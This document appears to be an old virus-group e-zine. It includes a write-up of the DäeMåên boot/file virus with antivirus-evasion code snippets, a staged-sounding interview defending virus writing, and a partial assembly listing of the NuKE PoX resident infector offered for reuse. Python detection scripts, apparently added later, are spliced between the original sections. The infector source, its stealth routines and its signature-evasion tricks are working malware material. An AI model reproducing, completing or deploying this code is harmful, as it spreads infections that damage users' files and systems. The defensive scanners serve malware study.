Files ending with the extensions .COM, .EXE, .BIN, .OVL and .SYS will be   
infected on every possible file handle access I could find, ie. they       
will be infected on Open (3D), Close (3E), Attrib Change (43), Execution   
(4B), Handle Rename/Move (56), and Extended Open (6C). It manages to       
infect on file close by recording the filename by intercepting Create      
(3C) call, and the handle if it was created successfully.                  
                                                                           
If it goes resident from an infected file, it will not hook int 13h directly,
instead searching segment 70h for DOS's call to the original interrupt     
handler, then putting our address in there instead and using the old       
address for our calls. It would have been possible to search the ROM       
BIOS for the correct handler, but that would circumvent future             
generations of boot/file viruses.                                          
                                                                           
DäeMåên employs a small decryption algorithm, however it is not variable
mutation, since a few registers have to be saved in order for the SYS      
infection to work. The code is thoroughly encrypted, and McAfee and        
friends will have to write a new disinfection engine for this baby.        
However, disk infections are not encrypted, although it would have been    
easily done.                                                               
                                                                           
The routine to load the virus off the disk has been altered to avoid       
detection as Generic Boot Sector/Generic Partition virus. The changes      
are trivial, and it makes it look as if I don't know what I'm doing.       
The fact that I'm avoiding detection isn't readily apparent. Here is       
a code comparison, take a look for yourself.                               
                                                                           
        Generic                    DäeMåên                                 
     mov si, 413h               mov si, 412h                               
     sub word ptr [si], 3       add word ptr [si+1], -3         ; take 3k  
     int 12h                    lodsb                                      
                                lodsw                                      
     mov cl, 6                  mov cl, 6                                  
     shl ax, cl                 shl ax, cl                                 
     mov es, ax                 mov es, ax                                 
     xor bx, bx                 xor bx, bx                                 
                                                                           
The one on the left will be detected by SCAN, the one on the right will    
not. The differences are trivial. SCAN is such a stupid program, it's      
just ridiculous that millions of PC users rely on it utterly for total     
virus protection. That's great...                                          
                                                                           
DäeMåên is partially selective in which files it infects. Firstly, it      
will scan the filename for the characters SC, VS, CL and F-, which         
excludes a lot of scanners (eg SCAN, TBSCAN etc), VSHIELD, CLEAN and       
F-PROT.                                                                    
                                                                           
Nor will it infect programs which have internal overlays. This is a        
great advantage since people running WinDoze won't have their favourite    
XYZ program fuck up because a virus infected it. DäeMåên simply will       
not infect programs with internal overlays. Here is the code to detect     
them:                                                                      
                                                                           
chkovl:         call file_end                                              
                push ax                       ; check for internal overlays
                push dx                                                    
                mov ax, word ptr [page_cnt]                                
                mov cx, 512                                                
                mul cx                                                     
                pop cx                                                     
                pop bp                                                     
                cmp ax, bp                                                 
                jb done                                                    
                cmp dx, cx                                                 
                jb done                                                    
                [...]                                                      
done:           ret                                                        
                                                                           
Pretty simple routine, huh?                                                
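
The header fields touched by the routines above (offsets 2, 4, 8, 14, 16, 20 and 22 of the 'MZ' header) are the same ones an integrity checker records. An added example, not code from the article: a Python parser that recomputes the load-image size from the page count as the overlay test does, and reports header changes against a known-good baseline. Function names, the 4096-byte tail window and the zero-filled sample files are assumptions constructed for illustration.

```python
import struct

MZ = struct.Struct("<2s13H")          # first 28 bytes of an MS-DOS EXE header
FIELDS = ("e_cblp",      # 0x02 bytes used on last 512-byte page
          "e_cp",        # 0x04 page count
          "e_crlc", "e_cparhdr",      # 0x06 relocations, 0x08 header paragraphs
          "e_minalloc", "e_maxalloc",
          "e_ss", "e_sp",             # 0x0E, 0x10 initial stack
          "e_csum",
          "e_ip", "e_cs",             # 0x14, 0x16 entry point
          "e_lfarlc", "e_ovno")


def parse_mz(data):
    """Return the header fields plus the real file length."""
    if len(data) < MZ.size:
        raise ValueError("too short for an MZ header")
    magic, *values = MZ.unpack_from(data)
    if magic not in (b"MZ", b"ZM"):
        raise ValueError("not an MZ executable")
    hdr = dict(zip(FIELDS, values))
    hdr["file_size"] = len(data)
    return hdr


def image_size(hdr):
    """Bytes the DOS loader reads, derived from offsets 2 and 4."""
    if hdr["e_cp"] == 0:
        raise ValueError("page count of zero")
    if hdr["e_cblp"] == 0:
        return hdr["e_cp"] * 512
    return (hdr["e_cp"] - 1) * 512 + hdr["e_cblp"]


def analyze(data, tail_window=4096):
    """Static indicators only; each one needs a baseline to mean anything."""
    hdr = parse_mz(data)
    image = image_size(hdr)
    # CS:IP is relative to the load image, which starts after the header.
    entry = hdr["e_cparhdr"] * 16 + (((hdr["e_cs"] << 4) + hdr["e_ip"]) & 0xFFFFF)
    flags = []
    if hdr["file_size"] > image:
        flags.append("overlay")               # data beyond the load image
    elif hdr["file_size"] < image:
        flags.append("truncated")
    if entry >= image:
        flags.append("entry-outside-image")
    elif image >= 4 * tail_window and image - entry <= tail_window:
        flags.append("entry-near-end")        # entry point sits in the file's tail
    return {"image_size": image,
            "overlay_bytes": max(0, hdr["file_size"] - image),
            "entry_offset": entry,
            "flags": flags}


def header_diff(baseline, current):
    """Names of header fields (and file_size) that differ from the baseline."""
    a, b = parse_mz(baseline), parse_mz(current)
    return sorted(k for k in a if a[k] != b[k])


def build_exe(total_size, cs, ip, ss, sp, declared=None):
    """Constructed sample: a valid header followed by zero bytes, no code."""
    declared = total_size if declared is None else declared
    cp, cblp = (declared + 511) // 512, declared % 512
    hdr = MZ.pack(b"MZ", cblp, cp, 0, 2, 0, 0xFFFF, ss, sp, 0, ip, cs, 0x1C, 0)
    return hdr.ljust(total_size, b"\0")


# Constructed inputs: a baseline, the same file 2048 bytes longer with its
# header repointed at the tail, and a file carrying an internal overlay.
CLEAN = build_exe(20000, cs=0x0000, ip=0x0010, ss=0x0500, sp=0x0400)
CHANGED = build_exe(22048, cs=0x04E0, ip=0x0000, ss=0x0562, sp=0x0040)
OVERLAY = build_exe(30000, cs=0x0000, ip=0x0010, ss=0x0500, sp=0x0400,
                    declared=20000)

if __name__ == "__main__":
    for label, blob in (("clean", CLEAN), ("changed", CHANGED),
                        ("overlay", OVERLAY)):
        print(label, analyze(blob))
    print("changed fields:", header_diff(CLEAN, CHANGED))
```

The entry-near-end flag also fires on legitimate programs whose startup code is linked last, so it is a triage signal; the baseline diff is the stronger check.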
                                                                           
The beauty of this beast is that after one small mistake, like trying to
boot an infected disk by accident, or perhaps running an infected file,
the next time you boot up your system, EVERY file in your CONFIG.SYS,
AUTOEXEC.BAT and everything henceforth will become infected! It is very
easy to expose a large number of files to the virus in a very short        
space of time. Again, SCAN will probably help the spread of this virus     
immensely, by stupid users scanning their HD habitually, with the virus    
in memory... of course, EVERY file will then be infected.                  
                                                                           
As if that weren't enough for one virus, DäeMåên will also hide the        
increase of file size on the DOS directory. However, like most other       
viruses which employ this stealth method, CHKDSK will not report any       
allocation errors on these files. File size increase will be only 2048     
bytes, or 4096 bytes for SYS files. It will account for the different      
increase of the SYS.                                                       
                                                                           
To hide the increase, DäeMåên employs a little-exploited method, which     
is by adding 100 years to the date of the file. This way, other            
over-exploited methods (like setting the seconds field to a certain        
value) will not interfere with DäeMåên's stealth operation, and            
vice-versa.                                                                
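
Both infection markers described in this issue, the 60-second time stamp tested in the close-infection routine and the date pushed forward by 100 years, are values no normal file carries, so they can be found by reading raw directory entries from a clean boot. An added example, not code from the article: a Python scanner over 32-byte FAT directory entries. The function names, the `newest_year` threshold and the sample entries are assumptions constructed for illustration.

```python
import struct
from datetime import date

# 32-byte FAT directory entry:
# name, ext, attribute, reserved, time word, date word, start cluster, size
DIRENT = struct.Struct("<8s3sB10sHHHI")
ATTR_VOLUME = 0x08      # volume label bit (also set in 0x0F long-name entries)


def decode_stamp(time_w, date_w):
    """Unpack the packed DOS time and date words into plain integers."""
    return {
        "year": 1980 + (date_w >> 9),
        "month": (date_w >> 5) & 0x0F,
        "day": date_w & 0x1F,
        "hour": time_w >> 11,
        "minute": (time_w >> 5) & 0x3F,
        "second": (time_w & 0x1F) * 2,      # stored in 2-second units
    }


def check_entry(raw32, newest_year):
    """Return (filename, reasons) for an anomalous entry, else None."""
    name, ext, attr, _rsv, time_w, date_w, _clu, _size = DIRENT.unpack(raw32)
    if attr & ATTR_VOLUME:
        return None
    stamp = decode_stamp(time_w, date_w)
    reasons = []
    if stamp["second"] >= 60:               # field values 30 and 31 are invalid
        reasons.append("seconds=%d" % stamp["second"])
    if stamp["year"] > newest_year:
        note = "year=%d" % stamp["year"]
        if stamp["year"] - 100 >= 1980:     # consistent with a +100 year shift
            note += " (%d+100)" % (stamp["year"] - 100)
        reasons.append(note)
    if not reasons:
        return None
    fname = name.decode("cp437").rstrip()
    suffix = ext.decode("cp437").rstrip()
    if suffix:
        fname += "." + suffix
    return (fname, reasons)


def scan_directory(raw, newest_year=None):
    """Walk a raw directory region and collect anomalous time stamps."""
    if newest_year is None:
        newest_year = date.today().year
    findings = []
    for off in range(0, len(raw) - DIRENT.size + 1, DIRENT.size):
        first = raw[off]
        if first == 0x00:                   # end-of-directory marker
            break
        if first == 0xE5:                   # deleted entry
            continue
        hit = check_entry(raw[off:off + DIRENT.size], newest_year)
        if hit:
            findings.append(hit)
    return findings


def make_entry(name, ext, stamp, attr=0x20, size=1000):
    """Build one constructed directory entry for the sample below."""
    y, mo, d, h, mi, s = stamp
    time_w = (h << 11) | (mi << 5) | (s // 2)
    date_w = ((y - 1980) << 9) | (mo << 5) | d
    return DIRENT.pack(name.encode("cp437").ljust(8),
                       ext.encode("cp437").ljust(3),
                       attr, bytes(10), time_w, date_w, 2, size)


# Constructed sample directory (not taken from a real disk).
SAMPLE_DIR = b"".join([
    make_entry("COMMAND", "COM", (1993, 3, 13, 12, 30, 10)),
    make_entry("GAME", "EXE", (1992, 11, 2, 9, 15, 60)),
    make_entry("EDIT", "COM", (2093, 1, 5, 17, 45, 0)),
    make_entry("MYDISK", "", (2093, 1, 5, 0, 0, 0), attr=ATTR_VOLUME),
    b"\xe5" + make_entry("XOLD", "EXE", (2093, 1, 5, 0, 0, 60))[1:],
    bytes(32),                                          # end marker
    make_entry("AFTER", "EXE", (2093, 1, 1, 0, 0, 60)),  # never reached
])

if __name__ == "__main__":
    for fname, reasons in scan_directory(SAMPLE_DIR, newest_year=1993):
        print(fname, ", ".join(reasons))
```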
                                                                           
DäeMåên also includes a number of text strings:                            
                                                                           
        "[DäeMåên] by TäLöN-{NûKΣ}"                     25 bytes           
        "Hugs to Sara Gordon"                           19 bytes           
        "Hey John! If this is bad, wait for [VCL20]!"   43 bytes           
        "For Dudley"                                    11 bytes           
        "[VCL20ß]/TäLöN"                                15 bytes           
                                                total  113 bytes           
                                                                           
(That stuff about VCL20ß is ßogus, just to make McAsshole shit his         
pants. But AV researchers be warned: a fair few of the routines            
contained in DäeMåên will also appear in VCL 2.0, like the boot/file       
infect capability!)                                                        
                                                                           
Virus Length   = 2048                                                      
Message Length =  113                                                      
...Code Length = 1935 bytes!!!                                             
                                                                           
Totally unheard of!                                                        
                                                                           
I seriously doubt anybody can beat that, at least not for a while yet.     
                                                                           
For a quick rehash of what this virus does...                              
                                                                           
COM/EXE/BIN/OVL/SYS/MBR/BS Parasitic Self-Encrypting Stealth virus, a      
mere 2048 bytes long... but I can say Patricia Hoffman will totally fuck   
up her description of this virus, she is so pathetically brain-dead.       
                                                                           
Anyway, look out for a FULL STEALTH, WILDLY POLYMORPHIC COM/EXE/MBR        
INFECTOR coming soon to a computer installation near you!  From TäLöN of   
course!  And another one minus the polymorphism, under 800 bytes!          
                                                                           
Have fun!  And good night, John!                                           
                                                                           
                        TäLöN/NuKE                                         
===========================================================================
===========================================================================
Sunday Telegraph Interview                                                 
~~~~~~~~~~~~~~~~~~~~~~~~~~                                                 
                                                                           
Well, about a month ago a NuKE associate received a call from a female     
reporter named Barbara Lewis; it was not our first, and surely not our     
last. Nevertheless, the topic she raised was quite interesting! We have
the complete conversation with our NuKE member and Barbara Lewis.          
                                                                           
For those that need more info, Barbara Lewis is an English reporter for    
the _Sunday Telegraph_ in the United Kingdom. The article should           
also be published in the _New York Times_, and I guess we will pin it up   
with the others now. Anyhow the conversation...                            
                                                                           
Barbara> Beep-Bop-Beep-Dot-Beep-Beep-Bop. [Dials the number...]            
Nuke   > Hello?                                                            
                                                                           
Barbara> Yes, I'm looking for "Joseph Greco," as I am a reporter, Barbara  
         Lewis, for the _Sunday Telegraph_ in London. Is he there?         
Nuke   > This is he, how can I help you. [The old charms.]                 
                                                                           
Barbara> I am writing an article on virus groups and related underground   
         activities, I received this number from a friend telling me I     
         could get some information from you.                              
Nuke   > What do you wish to know, and I will see if I can help you.       
                                                                           
Barbara> I wish to know about the virus writers, why do they write such    
         programs? What do they find from these malicious programs?        
Nuke   > I believe you have the concept all messed up. Speaking on the     
         behalf of NuKE members we find that producing perhaps the         
         most technologically advanced virus to exist, will if chance help
         the AV (anti-virus) community to develop a standard or perhaps    
         a minimum of what their packages should do, as if it is capable   
         of the most advanced virus then getting the others is no problem. 
         Also, we see today that the anti-virus community are trying to    
         pull a suppression over all the computer users, and terrorize     
         them with this bad thing called a virus. Of course this method    
         is simply for the fact of increasing sales of their AV product,   
         which in turn is described to perform miracles when it comes      
         to virus protection. We have all heard about the well known       
         SCAN by McAfee, we have succeeded in removing all their virus
         strings and have found that there were only 850 of them, and
         doesn't SCAN boast 1700+ viruses? Perhaps he has a copy of        
         every virus twice? Who knows!                                     
                                                                           
Barbara> So you say that you are helping out the AV community?             
Nuke   > Well, not really, our basic idea is to help YOU, the average      
         computer user that is dumb on computer structures and uses        
         these software packages to only later find out he was raped,      
         raped out of his data and his money. I'll give you an example.    
         F-Prot is heard to be a great anti-viral kit, and that it can     
         stop many viruses in their tracks, unknown and known. Inside the
         F-Prot kit there is a program called VIRSTOP, it is a TSR program 
         that will check every file you run for infection etc... Now who   
         would expect that VIRSTOP only detects 800 viruses, NOT MORE!     
         And the strings are cheap works that would lose all credit for    
         Frisk and his package if "word got out!" Lemme tell you, the      
         well-known encryption engines like MtE are NOT detected by        
         VIRSTOP! It is not a miss in code, Frisk NEVER put the damn       
         routine inside, it is incapable of detecting any polymorphic virus
         that has infected the system! You have just succeeded in
         screwing yourself just as McAfee did with SCAN!                   
         See, we are here to show you the facts, many people are not       
         able to disassemble and look through the code and find out what   
         the virus package can detect! So we bring this information out
         to the public, all I say is TRUE and can be backed up with the    
         proof I found inside these AV programs!                           
                                                                           
Barbara> What about the virus writers wanting to cause damage?             
Nuke   > Again that is why we are here, if you produce a virus that
         is unbelievable, the advances in the scanners will increase by    
         learning from our viruses, and the chances of a 14-year-old       
         wanting to create a virus for revenge or whatever reason          
         cannot compete with this and their virus becomes a failure,
         which is exactly what we want! And we too do not enjoy those      
         "kids" that enjoy damage, we run this organization legally and    
         seriously. If we do find such a user within our circle surely     
         he will be made an example of.                                    
                                                                           
Barbara> There has been a group of teenagers in England that were virus    
         writers and called themselves ARCV, they have been arrested as    
         of Feb 8th, 1993 and are going on trial for creating viruses.
         What do you think of this?                                        
Nuke   > Yes, ARCV, I knew them well. In this case I CANNOT say that I     
         am happy to see them arrested, you see many of their viruses
         have been found and related to VCL/MPC generators. See, VCL is    
         a friendly user kit standing for Virus Creation Laboratory, all   
         one has to do is flag on the option he/she would want with his    
         dandy mouse and once done hit compile and the kit will produce    
         you the virus you asked it to do. Now are we going to put some-   
         one on trial for simply using such a program? Are we going to     
         introduce laws that make it illegal to run certain programs in    
         YOUR OWN computer? I find that a laugh! They certainly can not    
         be responsible!                                                   
                                                                           
Barbara> Then whom are we going to make responsible for these acts?
Nuke   > Tough question, well I certainly do not believe that ARCV is.     
         I know several who have used the VCL kit to generate viruses
         to test how effective their anti-virus program was. This person   
         created the virus, in order to test them, should he be arrested   
         and tried? How do we know if a "bullet-proof" vest can withstand  
         a bullet? Naturally we test it! Also I find you are losing
         touch with the real issue! A virus is nothing but a program, it   
         can not be created by itself, it will do exactly what the         
         creator wanted it to do! Nothing more or less. ARCV's viruses never
         contained any DAMAGING CODE, they were viruses with little messages
         and all... Wouldn't you say the guilty person is the one that
         intentionally or carelessly created the virus for the purpose to
         cause havoc? The maker of a gun is not responsible for all the
         murders but those that use it for that intention are.
                                                                           
Barbara> You seem to know a lot on what is happening on this topic, may I  
         ask what organization you belong to?
Nuke   > Sure, we called ourselves "NuKE" we are an international group,   
         ranging from Canada, USA, Australia, Europe. We are highly        
         organized, much more than what anybody would expect! We monitor   
         the virus and AV scene, not many would know it, but we do. We are 
         the makers of VCL which was the first of its kind, and STILL IS,  
         the ONLY virus kit to fully create your unique virus, many like   
         MPC consist of one virus which is broken up, we provide options as
         adding your own feature or choose any 24 we have. We will be
         releasing a VCL v2.0 to be again the FIRST of its kind surpassing 
         anything out there, it may "boggle" the world, but it will set    
         new standards and pave new methods of virus scanning, it will     
         unfortunately kill the little guys, but in this world you have to
         be very competitive. The VCL kit will perhaps be marketed, if you 
         wish you may even buy an advance copy when it comes out within    
         a month!                                                          
                                                                           
Barbara> Sounds interesting, what is the price range?                      
Nuke   > Humm...I guess 75$-100$ (US)                                      
                                                                           
Barbara> I'll leave you my number, +44-XX-XXX-XXXX. Call me when this      
         program is available.                                             
Nuke   > K0ol...Will do...     [Wow a date already?]                       
                                                                           
Barbara> I thank you for your time, and good day.    [Mush]
Nuke   > Okay now taw-taw...                        [English humour]       
                                                                           
                        The NuKE Associates                                
===========================================================================
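
The listing that follows marks each file it infects by forcing the seconds
field of the DOS timestamp to 1Eh (an impossible "60 seconds"), and its
directory handler hides that marker and the size growth while resident.
The sketch below is an added defensive example, not part of the journal: it
reads raw 32-byte FAT directory entries and flags that marker, generalised to
any out-of-range seconds value. The 1800-byte figure is the one stated in the
listing header and is assumed to equal virus_size; the sample directory is
constructed.

```python
import struct
from dataclasses import dataclass
from typing import Iterator, List, Optional, Tuple

MARKER_SECONDS_FIELD = 0x1E  # tested in the listing: and ax,1fh / cmp al,1eh
STATED_VIRUS_SIZE = 1800     # "Bytes: 1800 Bytes" in the header; assumed == virus_size
ATTR_VOLUME, ATTR_DIR = 0x08, 0x10
SAMPLE_DATE = ((1993 - 1980) << 9) | (3 << 5) | 13  # constructed: 1993-03-13


@dataclass
class Finding:
    name: str
    size: int
    seconds_field: int
    matches_marker: bool
    est_clean_size: Optional[int]


def pack_time(hour: int, minute: int, seconds_field: int) -> int:
    """DOS time word: hhhhh mmmmmm sssss, seconds stored as seconds/2."""
    return (hour << 11) | (minute << 5) | seconds_field


def iter_files(raw: bytes) -> Iterator[Tuple[str, int, int]]:
    """Yield (name, dos_time, size) for live file entries in a raw FAT directory."""
    for off in range(0, len(raw) - 31, 32):
        ent = raw[off:off + 32]
        if ent[0] == 0x00:          # end-of-directory marker
            break
        if ent[0] == 0xE5:          # deleted entry
            continue
        if ent[11] & (ATTR_VOLUME | ATTR_DIR):  # labels, LFN slots, subdirectories
            continue
        base = ent[0:8].decode("ascii", "replace").rstrip()
        ext = ent[8:11].decode("ascii", "replace").rstrip()
        dos_time = struct.unpack_from("<H", ent, 22)[0]
        size = struct.unpack_from("<I", ent, 28)[0]
        yield (f"{base}.{ext}" if ext else base), dos_time, size


def scan_directory(raw: bytes) -> List[Finding]:
    """Flag files whose seconds field is out of range (valid values are 0..29)."""
    findings = []
    for name, dos_time, size in iter_files(raw):
        sec = dos_time & 0x1F
        if sec <= 29:
            continue
        exact = sec == MARKER_SECONDS_FIELD
        # Only estimate the pre-infection size for the exact marker value.
        est = size - STATED_VIRUS_SIZE if exact and size > STATED_VIRUS_SIZE else None
        findings.append(Finding(name, size, sec, exact, est))
    return findings


def make_entry(base: str, ext: str, attr: int, dos_time: int, size: int) -> bytes:
    """Build one constructed 32-byte directory entry for the sample below."""
    return struct.pack("<8s3sB10xHHHI", base.ljust(8).encode(), ext.ljust(3).encode(),
                       attr, dos_time, SAMPLE_DATE, 2, size)


# Constructed sample directory (not taken from any real disk).
SAMPLE_DIR = b"".join([
    make_entry("DOSVOL", "", ATTR_VOLUME, pack_time(9, 0, 0x1E), 0),
    make_entry("COMMAND", "COM", 0x20, pack_time(12, 0, 0x1E), 49645),
    make_entry("CHKDSK", "EXE", 0x20, pack_time(5, 0, 0), 16200),
    b"\xe5" + make_entry("OLD", "COM", 0x20, pack_time(1, 1, 0x1E), 4000)[1:],
    make_entry("ODD", "COM", 0x20, pack_time(7, 30, 0x1F), 900),
    make_entry("UTILS", "", ATTR_DIR, pack_time(8, 0, 0x1E), 0),
    bytes(32),
    make_entry("AFTER", "COM", 0x20, pack_time(2, 2, 0x1E), 5000),
])

if __name__ == "__main__":
    for f in scan_directory(SAMPLE_DIR):
        kind = "NuKE PoX-style marker" if f.matches_marker else "invalid seconds"
        print(f"{f.name:12} size={f.size:6} sec_field={f.seconds_field:#04x} {kind}"
              f" est_clean_size={f.est_clean_size}")
```

Feed it directory sectors read after a clean boot or from a disk image: while
the handler in the listing is resident, FCB directory searches (AH=11h/12h)
come back with the seconds field cleared and the size already reduced.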
;==========================================================================
;                        ** NuKE Pox v2.0 **                               
;This is VERY old code but I promised to give it out, you'll see it exactly
;like Npox v1.1 in IJ#4, The code here is VERY BADLY written, I wrote WHOLE
;procedures TWICE! so LOTS of double code, I leave it UNTOUCHED for you to 
;see, and understand it! I don't care if you fuck with it, go for it!      
;The method of TSR is old, method of getting the Vectors is bad, the way   
;I infect EXEs ain't too hot... But hell it works! It infects overlays..   
;it won't infect F-prot.exe or anything with ????SCAN.EXE like SCAN.EXE or 
;TBSCAN.EXE etc... Command.com dies fast... Really neat...Play all you like
;                                                                          
;And to all those that said I `Hacked' this...                             
; FFFFFF UU   UU   CCCC   KK  KK       YY    YY   OOOO   UU   UU           
; FF     UU   UU  CC  CC  KK KK         YY  YY   OO  OO  UU   UU           
; FFFF   UU   UU  CC      KKK      ===    YY     OO  OO  UU   UU           
; FF     UU   UU  CC  CC  KK KK           YY     OO  OO  UU   UU           
; FF      UUUUUU   CCCC   KK  KK          YY      OOOO    UUUUUU           
;Just cuz you can't do it, doesn't mean I can't, anyhow my 93 viruses are  
;500% better than this one...                                              
;*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
;-*      (c) Rock Steady, Viral Developments                             -*
;*-      (c) NuKE Software Developement  1991, 1992                      *-
;-*                                                                      -*
;*-  Virus: NuKE PoX              Version: 2.0                           *-
;-*  ~~~~~~                       ~~~~~~~~                               -*
;*-  Notes: EXE & COM & OVL Infector, TSR Virus. Dir Stealth Routine.    *-
;-*         Will Disinfect files that are opened, and re-infect them     -*
;*-         when they are closed! Executed files are disinfected then    *-
;-*         executed, and when terminated reinfected!                    -*
;*-         VERY HARD to stop, it goes for your COMMAND.COM! beware!     *-
;-*         It is listed as a COMMON Virus due to its stealthiness!      -*
;*-  Bytes: 1800 Bytes                                                   *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
virus_size      equ     last - init_virus       ;Virus size                
mut1            equ     3                                                  
mut2            equ     1                                                  
mut3            equ     103h                    ;Offset location           
                                                                           
seg_a          segment   byte public                                       
               assume    cs:seg_a, ds:seg_a                                
                org     100h                    ;COM file!                 
rocko           proc    far                                                
start:          jmp     init_virus                                         
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- 
;                       Virus Begins Here...                               
;------------------------------------------------------------------------- 
init_virus:     call    doit_now                ;Doit VirusMan...          
doit_now:       pop     bp                      ;Not to Lose Track         
                sub     bp,106h                 ;Set our position          
                push    ax                      ;Save all the registers
                push    bx                                                 
                push    cx                                                 
                push    dx                                                 
                push    si                                                 
                push    di                                                 
                push    bp                                                 
                push    es                                                 
                push    ds                                                 
                mov     ax,0abcdh               ;Are we resident Already?  
                int     21h                     ;***McAfee Scan String!    
                cmp     bx,0abcdh               ;Yupe... Quit Then...      
                je      exit_com                                           
                push    cs                      ;Get CS=DS                 
                pop     ds                                                 
                mov     cx,es                                              
                mov     ax,3521h                ;Sometimes tend to inter-  
                int     21h                     ;cept this Interrupt...    
                mov     word ptr cs:[int21+2][bp],es    ;Save the Int      
                mov     word ptr cs:[int21][bp],bx      ;Vector Table      
                dec     cx                      ;Get a new Memory block    
                mov     es,cx                   ;Put it Back to ES         
                mov     bx,es:mut1              ;Get TOM size              
                mov     dx,virus_size           ;Virus size in DX          
                mov     cl,4                    ;Shift 4 bits              
                shr     dx,cl                   ;Fast way to divide by 16  
                add     dx,4                    ;add 1 more para segment   
                mov     cx,es                   ;current MCB segment       
                sub     bx,dx                   ;sub virus_size from TOM   
                inc     cx                      ;put back right location   
                mov     es,cx                                              
                mov     ah,4ah                  ;Set_block                 
                int     21h                                                
                                                                           
                jc      exit_com                                           
                mov     ah,48h                  ;now allocate it           
                dec     dx                      ;number of para            
                mov     bx,dx                   ;                          
                int     21h                                                
                jc      exit_com                                           
                dec     ax                      ;get MCB                   
                mov     es,ax                                              
                mov     cx,8h                   ;Made DOS the owner of MCB 
                mov     es:mut2,cx              ;put it...                 
                sub     ax,0fh                  ;get TOM                   
                mov     di,mut3                 ;beginning of our loc in mem
                mov     es,ax                   ;                          
                mov     si,bp                   ;delta pointer             
                add     si,offset init_virus    ;where to start            
                mov     cx,virus_size                                      
                cld                                                        
                repne   movsb                    ;move us                  
                                                                           
                mov     ax,2521h                ;Restore Int21 with ours   
                mov     dx,offset int21_handler ;Where it starts           
                push    es                                                 
                pop     ds                                                 
                int     21h                                                
exit_com:       push    cs                                                 
                pop     ds                                                 
                cmp     word ptr cs:[buffer][bp],5A4Dh                     
                je      exit_exe_file                                      
                mov     bx,offset buffer        ;Its a COM file restore    
                add     bx,bp                   ;First three Bytes...      
                mov     ax,[bx]                 ;Mov the Byte to AX        
                mov     word ptr ds:[100h],ax   ;First two bytes Restored  
                add     bx,2                    ;Get the next Byte         
                mov     al,[bx]                 ;Move the Byte to AL       
                mov     byte ptr ds:[102h],al   ;Restore the Last of 3b    
                pop     ds                                                 
                pop     es                                                 
                pop     bp                      ;Restore Registers
                pop     di                                                 
                pop     si                                                 
                pop     dx                                                 
                pop     cx                                                 
                pop     bx                                                 
                pop     ax                                                 
                mov     ax,100h                 ;Jump Back to Beginning    
                push    ax                      ;Restores our IP (a CALL   
                retn                            ;Saves them, now we changed
command         db      "C:\COMMAND.COM",0                                 
                                                                           
exit_exe_file:  mov     bx,word ptr cs:[vir_cs][bp]     ;fix segment loc   
                mov     dx,cs                           ;                  
                sub     dx,bx                                              
                mov     ax,dx                                              
                add     ax,word ptr cs:[exe_cs][bp]     ;add it to our segs
                add     dx,word ptr cs:[exe_ss][bp]                        
                mov     bx,word ptr cs:[exe_ip][bp]                        
                mov     word ptr cs:[fuck_yeah][bp],bx                     
                mov     word ptr cs:[fuck_yeah+2][bp],ax                   
                mov     ax,word ptr cs:[exe_ip][bp]                        
                mov     word ptr cs:[Rock_fix1][bp],dx                     
                mov     word ptr cs:[Rock_fix2][bp],ax                     
                pop     ds                                                 
                pop     es                                                 
                pop     bp                                                 
                pop     di                                                 
                pop     si                                                 
                pop     dx                                                 
                pop     cx                                                 
                pop     bx                                                 
                pop     ax                                                 
                db      0B8h                   ;nothing but MOV AX,XXXX    
Rock_Fix1:                                                                 
                dw      0                                                  
                cli                                                        
                mov     ss,ax                                              
                db      0BCh                   ;nothing but MOV SP,XXXX    
Rock_Fix2:                                                                 
                dw      0                                                  
                sti                                                        
                db      0EAh                    ;nothing but JMP XXXX:XXXX 
Fuck_yeah:                                                                 
                dd      0                                                  
int21           dd      ?                       ;Our Old Int21             
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- 
;                       Dir Handler                                        
;------------------------------------------------------------------------- 
old_dir:        call    calldos21               ;get FCB                   
                test    al,al                   ;error?                    
                jnz     old_out                 ;nope                      
                push    ax                                                 
                push    bx                                                 
                push    es                                                 
                mov     ah,51h                  ;get PSP                   
                int     21h                                                
                mov     es,bx                   ;                          
                cmp     bx,es:[16h]             ;                          
                jnz     not_infected                                       
                mov     bx,dx                                              
                mov     al,[bx]                                            
                push    ax                                                 
                mov     ah,2fh                                             
                int     21h                                                
                pop     ax                                                 
                inc     al                       ;Extended FCB?            
                jnz     fcb_okay                                           
                add     bx,7h                                              
fcb_okay:       mov     ax,es:[bx+17h]                                     
                and     ax,1fh                                             
                cmp     al,1eh                                             
                jnz     not_infected                                       
                and     byte ptr es:[bx+17h],0e0h       ;fix secs          
                sub     word ptr es:[bx+1dh],virus_size                    
                sbb     word ptr es:[bx+1fh],0                             
not_infected:   pop     es                                                 
                pop     bx                                                 
                pop     ax                                                 
old_out:        iret                                                       
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- 
;                       Int 21 Handler                                     
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- 
int21_handler:  cmp     ah,11h                                             
                je      old_dir                                            
                cmp     ah,12h                                             
                je      old_dir                                            
                cmp     ax,4b00h                ;File executed             
                je      dis_infect                                         
                cmp     ah,3dh                                             
                je      check_file                                         
                cmp     ah,3eh                                             
                je      check_file2                                        
                cmp     ax,0abcdh               ;Virus testing             
                jne     int21call                                          
                mov     bx,0abcdh                                          
int21call:      jmp     dword ptr cs:[int21]    ;Split...                  
                                                                           
check_file:     jmp     opening_file            ;Like a Charm              
check_file2:    jmp     closing_file                                       
dis_infect:     call    disinfect               ;EXE & COM okay            
dont_disinfect: push    dx                                                 
                pushf                                                      
                push    cs                                                 
                call    int21call                                          
                pop     dx                                                 
                                                                           
execute:        push    ax                                                 
                push    bx                                                 
                push    cx                                                 
                push    dx                                                 
                push    ds                                                 
                                                                           
                push    ax                                                 
                push    bx                                                 
                push    cx                                                 
                push    dx                                                 
                push    ds                                                 
                push    bp                                                 
                push    cs                                                 
                pop     ds                                                 
                mov     dx,offset command                                  
                mov     bp,0abcdh                                          
                jmp     command1                                           
command_ret:    pop     bp                                                 
                pop     ds                                                 
